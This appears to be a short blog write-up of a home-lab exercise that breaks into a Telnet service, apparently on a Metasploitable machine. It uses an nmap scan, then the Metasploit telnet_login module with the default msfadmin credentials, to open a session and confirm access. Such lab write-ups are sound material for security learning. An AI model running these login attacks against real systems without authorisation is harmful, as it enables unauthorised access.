Back to blog
Feb 25, 2026
2 min read

Telnet Exploitation Report

Telnet is a protocol used for remote login to systems over a network. It typically runs on **port 23**....

What is Telnet?

Telnet is a protocol used for remote login to systems over a network. It typically runs on port 23.

It allows users to:

  • Access a remote terminal
  • Execute commands on a remote machine

However, Telnet is not secure because:

  • It sends data in plain text
  • Credentials can be easily intercepted

How Telnet Works

Telnet follows a client-server model:

  1. Client connects to server on port 23
  2. Server prompts for username and password
  3. User authenticates
  4. A command-line session is established

Unlike SSH, no encryption is used, making it highly vulnerable.


Exploitation Methodology

Initial Recon (Nmap Scan)

nmap -sV 192.168.6.129

Pasted image 20260404145929.png

From the scan:

  • Port: 23
  • Service: Telnet
  • Version: Linux telnetd

Checking for Exploits (Metasploit)

Step 1: Start Metasploit

msfconsole

Pasted image 20260404150540.png


Step 2: Search for Telnet modules

search telnet

Pasted image 20260404162451.png

Result:

  • Mostly scanner / brute-force modules
  • No direct RCE exploit found

Exploit using Metasploit

Step 1: Use Telnet login module

use auxiliary/scanner/telnet/telnet_login

Pasted image 20260404171204.png


Step 2: Set options

set RHOSTS 192.168.6.129
set USERNAME msfadmin
set PASSWORD msfadmin
set RPORT 23

Pasted image 20260404171238.png


Step 3: Run the module

run

or 

exploit

Pasted image 20260404171323.png

If successful:

  • Valid credentials will be found
  • Session may open
sessions

session -i <session id>

Pasted image 20260404171455.png


Result

Check user

whoami

Pasted image 20260404171600.png

This confirms:

Successful remote access via Telnet.